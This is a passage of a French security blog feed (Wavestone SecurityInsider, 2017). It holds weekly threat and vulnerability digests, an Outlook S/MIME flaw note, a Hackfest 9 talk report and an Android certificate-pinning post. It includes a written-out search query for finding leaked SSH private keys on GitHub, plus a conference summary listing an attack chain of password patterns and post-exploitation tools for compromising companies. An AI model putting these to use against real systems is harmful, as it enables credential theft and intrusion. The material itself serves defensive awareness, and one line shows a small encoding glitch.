Quantcast
Channel: Wavestone SecurityInsider
Viewing all 125 articles
Browse latest View live

CERT-W : Retours sur l'actualité des semaines du 16 au 29 octobre 2017

October 31, 2017, 8:32 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !
Retrouvez également le focus sur la CVE 2017-11776 par Cyprien OGER.

Veille cybercriminalité

IoTroop / Reaper

Près d'un an après Mirai, un nouveau botnet d'objets connectés prend vie. IoTroop (ou Reaper selon les sources) possèderait déjà des millions d'équipements utilisables, tels que des caméras de sécurité IP exposées sur Internet, dans l'optique de conduire des attaques massives de type DDoS.

Bitcoin mine

Le prix du Bitcoin a récemment atteint des sommets records, avec un prix par unité autour de 6000 dollars. L'explosion du prix des cryptomonnaies a notamment abouti à la création d'une bibliothèque JavaScript nommée CoinHive permettant aux utilisateurs d'un site le prêt de ressources CPU pour le minage de Monero.
Cependant, cette bibliothèque ou des bibliothèques similaires ont récemment été détournées et insérées sur nombreux sites ayant été piratés au préalable.

Adobe CVE Player

La vulnérabilité CVE-2017-11292, ciblant Adobe Flash Player, a été patchée il y a peu par Adobe. Cependant, de nombreux groupes de pirates (Fancy Bear, APT28, BlackOasis, etc.) tentent encore activement d'exploiter cette vulnérabilité, notamment sur les territoires européens et étasuniens. L'attaque se propage actuellement au travers de phishing ciblé (spear phishing).

Ce lapin n'est pas gentil

BadRabbit est un clone récent du ransomware/wiper NotPetya qui avait touché l'Ukraine, puis l'Europe en juillet 2017. Tout comme son prédécesseur, il repose sur l'utilisation des exploits ETERNALBLUE et ETERNALROMANCE, ainsi que sur la présence de credentials en mémoire, pour se propager. In fine, le résultat est similaire : les fichiers de l'utilisateurs sont chiffrés, et la MFT est détruite.
Selon des chercheurs en sécurité, certains scénarios permettraient la récupération de données, tels que l'utilisation des Shadow Copies non supprimées.
Il est encore une fois recommandé, lorsque celà est possible, d'effectuer une capture de la mémoire vive et un backup du disque (partiellement) chiffré dans l'éventualité ou les clés de chiffrement pourraient être récupérées.

Appleby is the new Panama

La société Appleby, basée aux Bermudes, fourni des services juridiques aux entreprises les plus riches à travers le monde. Récemment touchée par un "incident de sécurité", les retombées de ce présupposé piratage pourraient faire écho à l'affaire des Panama Papers.

Veille vulnérabilité

Yet another Linux privesc

Une nouvelle vulnérabilité est sortie sur le noyau Linux en version 4.14.0-rc4. Elle repose la possibilité d'utiliser un pointeur vers la mémoire noyau lors de l'appel à la fonction waitid() et permet à un utilisateur standard d'élever ses privilèges.

PUT your JSP

Une vulnérabilité présente sur les branches 7, 8 et 9 des serveurs Tomcat ayant activé la méthode PUT permet à un attaque de déposer et d'exécuter des fichiers JSP arbitraires sur le serveur. Un plugin Metasploit a déjà été développé pour exploiter cette vulnérabilité.

L'attaque des clones

Baptisé "Fobrob", cet exploit cible les véhicules connectés de la marque Subaru et peut permettre à un attaquant d'accéder de manière illégitime au véhicule. L'exploit se base sur une vulnérabilité au sein de la fonction de génération de codes aléatoires, les rendant partiellement prédictibles et rejouables par l'attaquant, clonant alors de manière efficace la clé de voiture.

Matriochkas

La vulnérabilité 2017-11826 est une vulnérabilité critique affectant toutes les versions de Microsoft Office (via un bug dans le parseur XML) et ayant été utilisée dans le cas d'attaques ciblées (APT). L'article présent dans les sources détaille analyse un exploit de cette vulnérabilité - un fichier RTF contenant un fichier Word. Ce dernier contient la charge malveillante qui permet d'aboutir à l'exécution de code malveillant.

Indicateurs de la semaine

Le leak de la semaine - South Africa

L'un des backups d'une base de données de l'entreprise Jigsaw Holdings a été récupéré par un groupe de pirates en raison du faible niveau de sécurité du serveur sur lequel il était stocké. Ce backup contient des informations sensibles (nom, numéro de carte d'identité, adresses, salaires, etc.) de plus de 75 millions d'habitants d'Afrique du Sud.
Le chercheur en sécurité Troy Hunt a intégré cette nouvelle base au site déjà existant haveibeenpwned.com.

L'exploit de la semaine - XXE sur JNLP

Java, à l'instar de Flash, existait sous forme de plugin NPAPI au sein des navigateurs les plus courants (Internet Explorer, Mozilla Firefox, Chrome). Cette technologie permet l'exécution de code Java dans le contexte du navigateur, ce qui, en raison de la sensibilité des informations présentes et de l'abondance de vulnérabilités affectant Java, pose un risque de sécurité.
Lors du retrait du support de la technologie NPAPI sur certains navigateurs Java Web Start est devenue une alternative viable, permettant à l'utilisateur de télécharger un fichier XML sous l'extension ".jnlp" dans l'optique de faire exécuter l'applet en parallèle des processus du navigateur.
La CVE 2017-10309 utilise ce format de fichier et son ouverture automatique par le programme "jp2launcher.exe". Ce dernier semble être vulnérables aux injections de type eXternal XML Entity (XXE), permettant à l'attaquant de récupérer des fichiers sur le poste de sa victime, et ce seulement en visitant un site contrôlé par l'attaquant.

L'attaque de la semaine - WiFi (un)Protected Access 2

Désormais célèbres sous le nom de "KrackAttack" et publiées mi-octobre 2017, la CVE 2017-13077 et ses consoeurs décrivent un ensemble de vulnérabilités liées au protocole WPA2 et permettant a minima l'interception de données normalement protégées par une couche de chiffrement.
Krack ne cible pas directement le standard WPA2, qui avait été prouvé formellement comme étant sécurisé, mais un aspect "hors-scope" de cette preuve nommé "4-way handshake". Via cette attaque, il est possible de bloquer et retransmettre certains afin de forcer la réutilisation d'un nombre aléatoire (nonce) et la réinstallation de clés de chiffrement.
Les impacts varient selon l'équipement et les CVE auxquelles il est exposé, allant du simple déchiffrement de paquets à l'envoi de paquets arbitraires sous l'identité du client ou de la borne.

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
27.0.0.183
Adobe Acrobat Reader DC
2017.012.20093
Java
Version 8 Update 151
Mozilla Firefox
56.0.2
Google Chrome
62.0.3202.75
VirtualBox
5.2.0
CCleaner
5.36.6278

Jean MARSAULT
Search

CVE-2017-11776 : Outlook vs S/MIME

October 31, 2017, 8:33 am
$
0
0

Ce focus aborde le sujet de la CVE 2017-11776, une vulnérabilité ciblant Microsoft Outlook, de ses impacts, et des actions à réaliser post-correction.

Une vulnérabilité relative au chiffrement S/MIME dans Outlook

Une faille de sécurité dans Outlook relative au chiffrement S/MIME des e-mails a été identifiée (CVE-2017-11776). Elle concerne les mails chiffrés envoyés par Outlook au format « texte brut » :


Depuis environ 6 mois, les mails chiffrés envoyés rédigés au format « texte brut» sont envoyés à la fois chiffrés et en clair par Outlook dans le corps du mail envoyé. Les mails au format « HTML » ont, eux, été correctement chiffrés intégralement.


Étendue de la vulnérabilité

La vulnérabilité ne s’applique que lorsqu’Outlook a envoyé un mail chiffré avec S/MIME au format brut. Si un autre client mail (Thunderbird, Webmail, etc.) a envoyé un mail chiffré, celui-ci sera correctement chiffré.
La transmission du message en clair est variable :
  • Dans le cas d’Outlook avec Exchange : 
    • Lorsque le destinataire n’est pas dans le même domaine de mails, le message en clair est envoyé au premier relai (MTA) puis supprimé par la suite
    • Lorsque le destinataire est dans le même domaine de mails, le message en clair est envoyé au premier relai (MTA) puis acheminé jusqu’à la boîte de réception du correspondant
  • Dans le cas d’Outlook avec SMTP, le message en clair est envoyé tout le long de la chaîne de transmission du mail jusqu’à la boîte de réception du correspondant

Un script PowerShell a été développé par Wavestone afin de permettre la recherche parmi une boîte aux lettres Outlook de mails chiffrés avec S/MIME au format « texte brut ». Il est disponible à cette adresse et est à exécuter lorsqu'Outlook est ouvert.


Correctifs

Cette vulnérabilité est corrigée dans les mises à jour Outlook suivantes : 
  • Deferred Channel: Version 1705 (Build 8201.2200) – publiée le 10 octobre 2017
  • Monthly Channel: Version 1708 (Build 8431.2107) – publiée le 10 octobre 2017


Source



Cyprien OGER

CERT-W : Retours sur l'actualité de la semaine du 13 au 19 novembre 2017

November 22, 2017, 8:16 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !
Retrouvez également le focus de la semaine par Thomas DEBIZE, le compte-rendu de la conférence Hackfest 9.

Veille cybercriminalité

L'ANSSI publie une guide sur l'acquisition et l'exploitation des noms de domaines

Les prédictions de Kaspersky en matière de menaces cybercriminelles pour 2018

Zscaler publie une analyse de quelques malwares exploitant la vulnérabilité liée au protocole DDE au sein de fichiers Microsoft Office

Des spams et arnaques envoyés sur WhatsApp tirent partie des noms de domaine internationalisés

La principale astuce de ce type d'attaque étant d'utiliser des caractères visuellement similaires

Google analyse les causes communes de fuite d'authentifiants gmail

Une vague de ransomware utilise une attaque par bruteforce sur les services RDP exposés sur Internet


IBM, Packet Clearing House et GlobalCyberAlliance ouvrent un service Quad9 de résolution DNS public

Le principal avantage de ce résolveur, contrairement aux DNS publics de Google, est de permettre un accès via une connexion chiffrée TLS

La société IOActive publie une analyse du rapport de l'attaque WannaCry subie par le système de santé britannique NHS

L'impact de l'attaque sur les actifs NHS avait été massivement relayé dans les médias (actes médicaux suspendus, patients transférés entre hopitaux etc.)

Une porte dérobée dans le One Plus permettrai de récupérer un accès root sans débloquer le bootloader

Un chercheur anonyme répondant sous le nom d'Elliot Anderson (personnage principal de la série Mr Robot) a découvert un outil de debug toujours présent dans les téléphones One Plus. Cet outil nommé EngineerMode permet à une personne disposant d'un accès physique au téléphone de récupérer un accès root, et ainsi d'accéder à l'ensemble des données.

Veille vulnerabilite

L'ANSSI publie une guide sur la mise en oeuvre des fonctionnalités de sécurité de Windows 10 reposant sur la virtualisation

Les technologies Virtual Secure Mode, Device Guard et Credential Guard sont abordées

L'agence nationale de sécurité SI australienne publie une note de recommandation en matière de contrôle d'accès et de politique de mot de passe

Google annonce que son nouveau téléphone Pixel 2 est équipé d'une puce TPM

Sur Android les puces TPM déclinent le concept de "Trusted Execution Environment" o񠬥s secrets d'authentification sont stockés et les tentatives d'authentification exécutées. La caractéristique principale d'une puce TPM étant l'inviolabilité au niveau électronique et l'impossibilité d'extraire les secrets pour les casser hors-ligne

PentestPartners publie une analyse la sécurité du protocole de communication utilisé pour le transport de container maritime

PentestPartners publie quelques recommandations de sécurité aux concepteurs d'objets connectés sur le choix du microcontrôleur

Dyn revient sur une fuite de route BGP ayant impacté et ralenti des millions de connexions le 6 novembre 2017 en amérique du nord

RiskBasedSecurity publie son rapport de vulnérabilités divulguées au cours du troisième trimestre 2017

39.9% des vulnérabilités rapportées ont un score CVSSv2 supérieur à 7.0

Talos dévoile de multiples vulnérabilités impactant la caméra IP Foscam C1 Indoor HD

La société IOActive publie une analyse de la sécurité de plusieurs systèmes de communication maritime

Windows 10 et la fonctionnalité de "Controlled Access Folder" introduite avec la dernière mise à jour majeure (Fall Creators)

La reconnaissance faciale d'Apple contournée par une impression 3D

Malgré les nombreux mécanismes de sécurité implémentés par la reconnaissance faciale de l'iPhone X (détecteur de chaleur, de profondeur, à l'aide de plus de trente milles points infrarouges, etc.), ce système d'authentification ne semble pas plus fiable que le classique mot de passe.
En effet, des chercheurs de la compagnie de sécurité vietnamienne Bkav ont réussi à contourner le mécanisme à l'aide de l'impression 3D d'un masque sur lequel sont collées des images 2D, le tout pour un total de moins de 150$.

GitHub prévient les développeurs de dépendances incluses dans les projets dont la version est obsolète

20 millions d'équipement Google Home et Amazon Echo sont affectés pas la vulnérabilité Blueborne

En septembre dernier, les huit vulnérabilités regroupées sous le nom de Blueborne et affectant de nombreux équipements Bluetooth étaient publiées. Deux mois plus tard, Armis, la compagnie ayant initialement rendu publique les vulnérabilités, a publié un communiqué indiquant que Blueborne serait toujours présents sur plus de 15 millions d'Amazon Echo et 5 millions de Google Home. La vulnérabilité permettrait alors de prendre le contrôle total de ces équipements en constante écoute de communications Bluetooth.

Un chercheur identifie une faille de sécurité pour le produit Amazon Alexa permettant d'énumérer les propriétaires de ces objets et de communiquer avec eux (audio, SMS)

Une vulnérabilité dans le service Amazon Key pourrait permettre la désactivation des caméras

Des chercheurs de Rhino Security Labs ont identifié une vulnérabilité dans le service Amazon's Key, permettant aux utilisateurs de se faire livrer leurs colis chez eux sous le contrôle d'une caméra et d'un verrou électronique.
La vulnérabilité rendue publique par les chercheurs permettrait alors de désactiver les équipements pour cambrioler les lieux.

CVE-2017-11882

Les chercheurs de la compagnie de sécurité Embeddi ont découvert une vulnérabilité critique dans le logiciel Microsoft Office. Cette vulnérabilité affectant l'ensemble des versions du logiciel depuis la 2007, et ce sur l'ensemble des systèmes d'exploitation de Microsoft, pourrait permettre à un attaquant à distance d'installer un programme malveillant sur le système (exécution de code à distance), et ce sans interaction utilisateur.
Cette vulnérabilité provenant d'un composant obsolète de Microsoft Office, les chercheurs ont également publié les commandes permettant de le désactiver (voir première source).

La vulnérabilité JOLTANDBLEED affecte les produits Oracle

L'éditeur Oracle a publié une mise à jour de sécurité critique concernant des vulnérabilités affectant plusieurs de ses produits qui reposent sur l'utilisation du protocole propriétaire Jolt.
Ces vulnérabilités, découvertes par des chercheurs de chez ERPScan et regroupées sous le nom de JoltandBleed, permettrait différentes manipulations de la mémoire pour aboutir à la récupération des données par un attaquant non authentifié.

Indicateurs de la semaine

L'attaque de la semaine - Le département de sécurité intérieure des Etats-Unis (DHS) révèle avoir mené un test d'intrusion sur un Boeing 757 et avoir pu prendre le contrôle à distance des systèmes de l'appareil

L'exploit de la semaine - Des chercheurs obtiennent un accès JTAG au composant Intel Management Engine (ME)

Intel ME est un système de management bas-niveau présent sur de nombreux processeurs Intel depuis 2006, une faille critique avait notamment été trouvée l'année dernière sur le composant Intel AMT basé sur Intel ME (cf. http://www.securityinsider-wavestone.com/2017/09/compte-rendu-de-la-conference-hitb-gsec-2017.html).
Cet accès via le protocole de débogage JTAG va permettre d'analyser en profondeur la sécurité d'un tel composant

Le leak de la semaine - De nombreuses données militaires américaines exposées via AWS S3

Trois buckets Amazon S3 contenant des Téraoctets de données d'archives de surveillance par les services militaire américains ont été découverts sur Internet. La cause, une mauvaise configuration des buckets les laissant accessibles publiquement à tous.

Le guide de la semaine - Mise en place des fonctionnalités de sécurité Windows 10 basées sur la virtualisation

Avec son système d'exploitation Windows 10 Entreprise, Microsoft propose différents mécanismes de sécurités reposants sur la virtualisation, et notamment Device Guard et Credential Guard.
Ces mécanismes de sécurité n'étant pas toujours faciles à déployer à large échelle, l'ANSSI a rendu public son guide de "mise en oeuvre des fonctionnalités de sécurité de Windows 10 reposant sur la virtualisation".

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
27.0.0.187
Adobe Acrobat Reader DC
2018.009.20044
Java
Version 8 Update 151
Mozilla Firefox
57.0 (Quantum)
Google Chrome
62.0.3202.97
VirtualBox
5.2.0
CCleaner
5.37.6309

Nicolas DAUBRESSE
Thomas DEBIZE

Compte-rendu de la conférence Hackfest 9 – 3 et 4 novembre 2017

November 22, 2017, 8:16 am
$
0
0

Wavestone était présent la 9ème édition de la conférence de sécurité québécoise « Hackfest » qui a cette année rassemblé plus d’un millier de participants et où Thomas DEBIZE de la practice Cybersecurity & Digital Trust a eu la possibilité de présenter les travaux autour de la sécurité Hadoop (Wavestone-Hackfest-2017-Hadoop-safari-Hunting-for-vulnerabilities-v1.0.pdf)

Nous vous proposons ci-dessous un compte-rendu d’une sélection de talks. 
Les vidéos associées seront prochainement publiées sur la chaine Youtube de la conférence disponible à l'adresse suivante : https://www.youtube.com/user/hackfestca/videos.
Nous tenons à remercier les organisateurs pour leur accueil chaleureux et l’ambiance détendue pour notre première participation, et qui nous l’espérons, ne sera pas la dernière !



Stantinko : Un botnet aux multiples facettes opérant depuis plus de 5 ans - Matthieu Faou & Frédéric Vachon 


Les deux chercheurs de la société ESET ont détaillé un écosystème de malware affilié à un botnet important d’au moins 500 000 machines nommé « Stantinko » visant plusieurs objectifs :
  • Détourner le trafic Web des victimes en les faisant passer par une régie publicitaire (click-fraud)
  • Trouver et compromettre des CMS Wordpress et Joomla en distribuant des tentatives d’authentification sur les interfaces d’administration 
  • Installer un outil d’accès à distance sur les postes des victimes
  • Piéger les comptes Facebook des victimes

Ce botnet vise uniquement les pays russophone dont entre autres la Russie, l’Ukraine, l’Azerbaidjan et la Géorgie.

La grande particularité de ce botnet est le soin très méticuleux apporté au développement des différents malwares impliqués par leurs auteurs, soin qu’il est courant de retrouver au sein de campagnes APT et non d’à-priori « simple » adware :
  • Les fonctions malveillantes sont insérées au sein de codes légitimes de projets open-source, telle que l’encodeur audio MP3 « Lame », l’encodeur vidéo « VP9 » ou encore une bibliothèque d’analyse de radiographies neurologiques. Cette pratique augmente sensiblement la probabilité de non-détection par les éditeurs anti-malwares, dans la mesure où le rapport code malveillant / code légitime est minimal et qu’il n’est pas courant de voire de telles bibliothèques utilisées dans des attaques
  • Les serveurs de commande et contrôle (C2) servent les véritables pages Web de description des projets open-source utilisées, les liens de ces pages pointant vers les dépôts officiels
  • Les malwares sont packés avec la solution VMProtect, solution complexe virtualisant le code original et pour laquelle il n’existe pas d’outil d’unpacking générique
  • Les malwares des différentes étapes (stage 1, 2 etc.) sont hébergés sur Yandex avec un lien à usage unique, complexifiant encore une fois le travail des analystes anti-malwares désireux de récupérer des échantillons
  • Les malwares mettent en œuvre de multiples protections anti-debug et anti-détection, dont par exemple l’usage de clé de chiffrement unique pour la communication avec le C2, le stockage de code malveillant au sein du registre Windows, ou l’utilisation de control-flow flattening (cf. image ci-après) visant à applatir la structure d’exécution et ainsi complexifier grandement l’analyse


L’infection initiale par ce botnet passe par le téléchargement d’un logiciel « FileTour » promettant notamment à ses utilisateurs de leur délivrer des coupons de réduction…et cette promesse est tenue, des coupons fonctionnels sont véritablement délivrés aux utilisateurs. 
Cette caractéristique, couplée à la sophistication des malwares, traduit le fait qu’un groupe très compétent et très organisé est derrière ce business très rentable de la fraude à la régie publicitaire.
Enfin, les chercheurs ont souhaité informer qu’une version Linux de cet écosystème a récemment été découverte et est pour l’instant limitée à l’injection d’un module de proxy SOCKS sur les machines victimes.


How To Pwn an Enterprise in 2017 (or 2016, or 2015...) - Johnny Xmas 


L’auteur de ce talk a dressé une liste de différentes étapes, qui fonctionnent malheureusement à tous les coups selon lui, pour s’introduire et compromettre à distance le SI d’une entreprise :
  • Pour la phase de reconnaissance : 
    • La cartographie des actifs sur Internet, par exemple via l’outil « Scancannon » (https://github.com/johnnyxmas/ScanCannon)
    • La récupération de noms d’utilisateur, pour mener une attaque par bruteforce sur les infrastructures communes telles qu’un VPN ou un webmail 
      • Via le site hunter.io
      • Via l’outil FOCA, en analysant les métadonnées de documents trouvés sur Internet
  • Pour la phase d’exploitation
    • L’utilisation de mots de passe triviaux : <mois><année>, <saison><année>, Password1 etc.


    • L’utilisation de l’outil « mailsniper » permettant d’attaquer les WebServices Exchange (EWS), l’auteur rappelant que ces WebServices ne requièrent pas d’authentification forte même si celle-ci est déployée sur le webmail
    • L’utilisation de l’outil « fiercephish » pour réaliser facilement une campagne de phishing

  • Pour la phase de post-exploitation, c’est-à-dire une fois l’attaquant positionné sur le réseau de l’entreprise
    • L’utilisation de l’outil « Responder » pour intercepter des requêtes d’authentification et récupérer des hashes utilisateur
    • La réalisation d’attaque par bruteforce sur les services SMB et WMI
    • L’utilisation des outils « Bloodhound », « Mimikatz », « Empire » et « Deathstar » pour facilement localiser des comptes possédant des privilèges d’administration du domaine/forêt, et récupérer les authentifiants associés


SniffAir: An Open-Source Framework for Wireless Security Assessments - How To Pwn an Enterprise in 2017 (or 2016, or 2015...) - Matthew Eidelberg & Steven Daracott 


Cet outil open-source facilite la collecte, la manipulation et l’analyse de traces Wi-Fi ainsi que la réalisation d’attaque sur les réseaux sans-fil tel que le bruteforce de nom d’utilisateur pour les réseaux utilisant EAP-TLS ou l’instanciation d’un point d’accès malveillant avec portail captif.



Full-contact recon: winning without exploits - Dual Core

Dans la même lignée que le talk de Johnny Xmas, l’auteur a voulu ici lister les différentes méthodes permettant d’obtenir des informations permettant de s’introduire sur un SI d’entreprise, sans même effectuer un scan de port ou de vulnérabilité sur celle-ci, et ainsi minimiser la probabilité de détection. 


En guise d’introduction, l’auteur a relaté une anecdote où il récemment pu s’introduire sur le SI sans même envoyer un paquet sur ses infrastructures d’une société en découvrant le nom d’un administrateur IT, en repérant son profil LinkedIn et en cassant son mot de passe via les dumps LinkedIn de 2013 et 2016. Le mot de passe cassé a été rejoué sur un serveur SSH exposé sur Internet et a permis d’obtenir instantanément les droits root sur la machine cible, ainsi que toutes les autres du SI.
Les plateformes et outils suivants ont été cités :
  • GeoIP et PTRarchive.com, pour obtenir les plages IP et domaines publiques d’une entreprise
  • Sublist3r, pour énumérer les sous-domaines
  • Shodan, pour identifier les services exposés
  • Github, pour collecter les adresses mail de collaborateurs de l’entreprise. Une démo de l’outil « githump » a été réalisée
  • Travis-CI, pour également collecter les adresses mail de collaborateurs
  • emailformat.com, pour lister les formats possibles de nom d’utilisateur sur un webmail
  • allmytweets.net, pour collecter diverses informations par un twittos
  • LinkedIn et notamment ses dumps de base de données volés
  • Des wikis d’entreprise, par exemple Atlassian, qui contiennent souvent des authentifiants
  • AWS S3, à la recherche d’éventuels buckets en lecture à tout le monde


BITSInject - Dor Azouri


Le service “Background Intelligent Transfer Service (BITS)” de Windows est un système d’ordonnancement d’envoi/réception de fichier, notamment utilisé par Windows Update. 
L’auteur a détaillé ici une faille qui permet à un attaquant disposant de privilèges d’administration sur une machine d’obtenir une invite de commande avec les privilèges « NT SYSTEM/AUTHORITY », permettant ainsi d’atteindre à la traçabilité des actions :



Microsoft a jugé qu’un attaquant disposant au préalable de privilèges d’administration pouvait faire beaucoup plus de dégâts sur un système, que cette faille n’apportait ainsi pas grand-chose et qu’elle n’allait pas être corrigée.



Genetic Algorithms for Brute Forcing - Christopher Ellis

Effectuer une attaque par bruteforce peut être réalisée suivant plusieurs méthodes dont entre autres :
  • L’énumération exhaustive d’un espace de possibilité
  • L’utilisation d’un dictionnaire, réduisant l’espace total à des cas déjà connus
  • L’utilisation de propriétés statistiques via les chaines de Markov, qui permettent de construire une liste de candidat basée sur la probabilité qu’un caractère en suive un autre. Par exemple dans la langue française, il est fort probable d’avoir un « e » ou « a » (et plus globalement une voyelle) après un « n » (et plus globalement après une consomme), plutôt qu’un « b »

L’auteur a présenté ici une méthode de bruteforce basée sur un algorithme d’évolution génétique, ayant pour principe que les candidats potentiel sont construits suivant le succès des tentatives précédents. Les futurs candidats calquent ceux ayant été précédemment fructueux. Par exemple, si pour le cassage d’une base de mot de passe, le motif « 4 caractères alphabétiques + 2 caractères numériques » est fructueux, l’algorithme va naturellement se concentrer sur celui-ci au détriment des autres possibilités.


L’auteur a publié le code de son outil : https://github.com/ChrisJoinEngine/GAForcer


Dissecting a metamorphic file-infecting ransomware – Raul Alvarez


Le chercheur de la société Fortinet a détaillé le ransomware « Virlock » qui possède la caractéristique d’être polymorphique, en réécrivant sa charge malveillante après chaque exécution, complexifiant ainsi la détection par les solutions anti-malwares. La charge est en effet déchiffrée avec la clé précédente, exécutée, puis re-chiffrée avec une nouvelle clé générée aléatoirement.



Élection présidentielle Française 2.0 – Damien Bancal

Le journaliste du site ZATAZ est revenu sur les attaques de déstabilisation informationnelle ayant eu lieu tout au long de la campagne de l’élection française présidentielle 2017, en insistant sur les vulnérabilités des sites/blogs des candidats, les fuites de données recensées et la lutte médiatique sur les réseaux sociaux.



Lessons learned hunting IoT malware – Olivier Bilodeau

Le chercheur a détaillé ici les étapes et écueils pour analyser des attaques sur des composants IoT à l’échelle d’Internet, au moyen de honeypots, à travers trois cas d’études : LizardSquad, Linux/Moose et Chaos.

CERT-W : Retours sur l'actualité de la semaine du 20 au 26 novembre 2017

December 4, 2017, 2:52 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !
Retrouvez également le focus de la semaine par Thomas DEBIZE, ce qui a changé pour l’épinglement de certificat à partir d’Android 7 Nougat.

Veille cybercriminalite

Fuite de données massive en 2016 chez Uber qui étouffe l'affaire

Les données de 57 millions de clients et conducteurs Uber ont été volées en 2016 par des hackers anonymes. L'attaque a été largement facilitée par le fait que la clé privée protégeant la base de données attaquée était disponible dans un fichier public sur un répertoire Github... Il est en effet possible de trouver un certain nombre de clés privées sur Github grâce à des recherches Google simples (ex: site:http://github.com inurl:ssh/id_rsa), ou bien directement via l'outil de recherche Github

Tether annonce un vol de 30 millions de cryptotokens

Tether est une entreprise controversée qui propose un service de cryptomonnaie basée sur des tokens à parité avec le dollar américain, ce qui en principe signifie que pour 1 million de Tether en circulation, l'entreprise possède de façon bien réelle ce million de dollars. L'utilité d'un vol de tokens est donc toute relative, étant donné que ceux ci peuvent être tout simplement annulés via une mise à jour du logiciel utilisé pour trader la cryptomonnaie... En revanche, ce vol remet l'entreprise sur la sellette alors que des soupçons pesaient déjà sur sa légitimité. Conclusion : N'investissez pas dans des Tethers tout de suite.

Le hacker d'HBO, qui a mis à disposition du public des épisodes inédits de plusieurs séries (dont GOT) aurait été identifié.


Veille vulnerabilite

Intel toujours dans la tourmente : des vulnérabilités supplémentaires trouvées

Après la faille trouvée la semaine dernière sur les composants Intel (cf Revue d'actualité), un autre set de vulnérabilités a été trouvé (CVE-2017-05 à 10). Les vulnérabilités utilisent différents mécanismes, depuis les buffers overflows à l'escalade de préivilèges. Ceci permet in fine l'exécution de code malveillant.

L'OWASP publie son nouveau TOP 10 des vulnérabilités WEB


Les imprimantes HP vulnérables à l'exécution de code à distance

La vulnérabilite (CVE-2017-2750) a été patchée par HP qui en avait été informé en aout. L'exploit est disponible sur GitHub.

Indicateurs de la semaine

Le leak de la semaine - Imgur a également discrètement avoué s'être fait voler les données de 1,7 millions d'utilisateurs en 2014


L'exploit de la semaine - Un PoC prouve la possibilité de répliquer du code VBA de façon légitime dans des macros

Il est possible de bypasser la désactivation des macros sur Office en modifiant simplement un registre. Une fois la modification effectuée, la macro peut écrire d'autres macros qui sont exécutées à chaque lancement de documents Office. De plus, le poste infecté est alors vulnérable à toute autre attaque basée sur des macros.

L'attaque de la semaine - Une campagne de propagation du ransomware Scarab est en cours via le réseau de botnet Necurs

Necurs est un des plus gros réseaux de botnets dédiés au spam du monde avec plus de 6 millions d'ordinateurs infectés. Il est notamment à l'origine de la propagation de Locky.

Suivi des versions

Produits
Version actuelle
Adobe Flash Player
27.0.0.187
Adobe Acrobat Reader DC
2018.009.20044
Java
Version 8 Update 151
Mozilla Firefox
57.0.1
Google Chrome
62.0.3202.97
VirtualBox
5.2.2
CCleaner
5.37.6309

Ce qui a changé pour l’épinglement de certificat à partir d’Android 7 Nougat

December 4, 2017, 2:52 am
$
0
0

La septième mouture d’Android, nommée « Nougat », estampillée « API level 24 », et publiée en août 2016, a introduit des changements importants en matière de sécurité des flux de communication SSL/TLS et plus particulièrement autour de l’épinglement de certificat (certificate-pinning en anglais).
Pour rappel, l’épinglement de certificat est une mesure de sécurisation visant à limiter l’impact de la compromission d’une Autorité de Certification (AC) en définissant précisément côté client quel certificat, ou quelle chaine de certification, est attendu (https://www.riskinsight-wavestone.com/2013/04/epinglez-vos-certificats).


Ce qui change pour les développeurs 

De manière simple, jusqu’à présent toute application Android faisait aveuglément confiance aux certificats présents dans les deux magasins disponibles sur un terminal, à savoir la base « système », provenant du projet AOSP https://android.googlesource.com/platform/system/ca-certificates/, et la base « utilisateur », contenant des certificats personnalisés, modifiable par un utilisateur du terminal.


Un développeur devait ainsi appliquer une section de code spécifique dans son application pour effectuer un épinglement : sans expérience dans ce domaine, un développement spécifique pouvait s’avérer être totalement ineffectif (https://www.synopsys.com/blogs/software-security/ineffective-certificate-pinning-implementations/). Nous conseillons d’ailleurs aux développeurs de se baser sur les exemples fournis par l’OWASP s’ils souhaitent mettre en œuvre une telle mesure (https://www.owasp.org/index.php/Certificate_and_Public_Key_Pinning).
Désormais, une application compilée avec à minima Android 7 comme version cible ne fera plus confiance par défaut au magasin « utilisateur » et devra explicitement définir les AC reconnues comme valides selon plusieurs possibilités :
  • Pour les phases de débogage uniquement : l’application doit dans ce cas être compilée avec l’instruction « debuggable=true» dans le Manifest
  • Par domaine
  • Pour une liste de domaine
  • Pour tous les domaines sauf exception

L’exemple suivant, tiré de ce blog post (https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html), illustre comment déclarer un AC valide pour le domaine « internal.example.com» :


Ce qui change pour les auditeurs/pentesters

Historiquement toute personne souhaitant analyser/auditer les flux Web d’une application et qui n’était pas en mesure de compiler l’application cible devait :
  1. Utiliser un proxy Web, par exemple Burp Suite 
  2. Ajouter l’AC de ce proxy dans le magasin « utilisateur » pour pouvoir intercepter les flux chiffrés SSL/TLS
  3. Désactiver la fonction d’épinglement de certificat au sein de l’application, notamment en patchant et recompilant l’application (https://medium.com/@felipecsl/bypassing-certificate-pinning-on-android-for-fun-and-profit-1b0d14beab2b)
  4. Rediriger les flux du terminal vers le proxy, par exemple via les paramètres de connectivité Wi-Fi


L’étape 2 étant désormais ineffective à partir d’Android 7, plusieurs possibilités s’offrent à un auditeur :

Un exemple détaillé d’application de cette méthode est disponible ici (https://blog.it-securityguard.com/the-stony-path-of-android-%F0%9F%A4%96-bug-bounty-bypassing-certificate-pinning/


En complexifiant la procédure d’interception des flux par des auditeurs bien intentionnés, ces modifications dans la gestion des certificats introduites à partir d’Android 7 permettent également de complexifier les possibilités d’interception par des personnes mal intentionnées tout en facilitant le travail des développeurs, dans l’objectif global de renforcer la confiance au sein de la plateforme mobile la plus utilisée au monde (https://www.idc.com/promo/smartphone-market-share/os).

CERT-W : Retours sur l'actualité de la semaine du 27 novembre au 3 décembre

December 14, 2017, 3:20 am
$
0
0

Comme chaque semaine, retrouvez notre revue d'actualité de la sphère cyber-sécurité. Cette compilation de brèves vous permettra d'alimenter les discussions des prochaines pauses cafés !

Veille cybercriminalité

Voler une Mercedes avec un répéteur RFID

